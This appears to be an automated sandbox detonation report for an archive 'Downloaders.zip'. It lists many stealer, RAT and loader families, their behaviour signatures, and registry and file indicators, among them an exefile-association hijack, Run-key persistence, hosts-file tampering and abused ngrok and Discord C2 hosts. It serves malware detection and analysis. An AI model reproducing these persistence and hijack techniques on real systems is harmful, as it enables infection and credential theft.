Analysis Overview
SHA256
16930620b3b9166e0ffbd98f5d5b580c9919fd6ccdcc74fb996f53577f508267
Threat Level: Known bad
The file Downloaders.zip was found to be: Known bad.
Malicious Activity Summary
AmmyyAdmin payload
Suspicious use of NtCreateUserProcessOtherParentProcess
RedLine payload
AsyncRat
Ammyy Admin
Redline family
Xworm family
Zharkbot family
Amadey
Detect Xworm Payload
Lumma Stealer, LummaC
Phorphiex payload
Quasar RAT
Xworm
Detects ZharkBot payload
Stealc
Quasar family
BabbleLoader
Neshta
Detect Neshta payload
Detects BabbleLoader Payload
Quasar payload
Asyncrat family
Ammyyadmin family
RedLine
Phorphiex, Phorpiex
FlawedAmmyy RAT
Phorphiex family
Lumma family
Flawedammyy family
ZharkBot
Neshta family
Amadey family
Stealc family
Babbleloader family
Async RAT payload
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Downloads MZ/PE file
Drops file in Drivers directory
Themida packer
Identifies Wine through registry keys
Checks computer location settings
Unsecured Credentials: Credentials In Files
Reads user/profile data of web browsers
Drops startup file
Executes dropped EXE
Checks BIOS information in registry
Loads dropped DLL
Modifies system executable filetype association
Reads data files stored by FTP clients
Legitimate hosting services abused for malware hosting/C2
Checks installed software on the system
Looks up external IP address via web service
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks whether UAC is enabled
Writes to the Master Boot Record (MBR)
Indicator Removal: File Deletion
Adds Run key to start application
Enumerates processes with tasklist
Suspicious use of NtSetInformationThreadHideFromDebugger
UPX packed file
Suspicious use of SetThreadContext
Drops file in System32 directory
Drops file in Windows directory
Drops file in Program Files directory
Enumerates physical storage devices
System Network Configuration Discovery: Internet Connection Discovery
Embeds OpenSSL
Program crash
System Location Discovery: System Language Discovery
Detects Pyinstaller
Unsigned PE
Checks processor information in registry
Suspicious use of FindShellTrayWindow
Scheduled Task/Job: Scheduled Task
Modifies registry key
Modifies data under HKEY_USERS
Suspicious use of SendNotifyMessage
Suspicious use of AdjustPrivilegeToken
Modifies registry class
Suspicious use of WriteProcessMemory
Delays execution with timeout.exe
Detects videocard installed
Views/modifies file attributes
Runs ping.exe
Suspicious use of SetWindowsHookEx
Suspicious behavior: EnumeratesProcesses
Uses Task Scheduler COM API
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-11-26 19:01
Signatures
Unsigned PE
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-26 19:01
Reported
2024-11-26 19:19
Platform
win10ltsc2021-20241023-en
Max time kernel
165s
Max time network
608s
Command Line
Signatures
Amadey
Amadey family
Ammyy Admin
AmmyyAdmin payload
Ammyyadmin family
AsyncRat
Asyncrat family
BabbleLoader
Babbleloader family
Detect Neshta payload
Detect Xworm Payload
Detects BabbleLoader Payload
Detects ZharkBot payload
FlawedAmmyy RAT
Flawedammyy family
Lumma Stealer, LummaC
Lumma family
Neshta
Neshta family
Phorphiex family
Phorphiex payload
Phorphiex, Phorpiex
Quasar RAT
Quasar family
Quasar payload
RedLine
RedLine payload
Redline family
Stealc
Stealc family
Suspicious use of NtCreateUserProcessOtherParentProcess
Xworm
Xworm family
ZharkBot
Zharkbot family
Async RAT payload
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\Files\random.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\100282~1\90B1CE~1.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\Files\TROJAN~1.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\rundll32.exe | N/A |
Command and Scripting Interpreter: PowerShell
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\Files\TROJAN~1.EXE | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\100282~1\90B1CE~1.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\Files\random.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\Files\TROJAN~1.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\Files\TROJAN~1.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\Files\random.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\100282~1\90B1CE~1.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\100301~1\AllNew.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\random.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\SubDir\Client.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\2946613613.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VLC_Media.lnk | C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VLC_Media.lnk | C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\Files\random.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\100282~1\90B1CE~1.EXE | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
Loads dropped DLL
Modifies system executable filetype association
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Themida packer
Unsecured Credentials: Credentials In Files
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\3582-490\dxwebsetup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysnldcvmr.exe" | C:\Users\Admin\AppData\Local\Temp\Files\m.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\Files\TROJAN~1.EXE | N/A |
Indicator Removal: File Deletion
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | 0.tcp.eu.ngrok.io | N/A | N/A |
| N/A | 0.tcp.in.ngrok.io | N/A | N/A |
| N/A | 0.tcp.in.ngrok.io | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | 0.tcp.eu.ngrok.io | N/A | N/A |
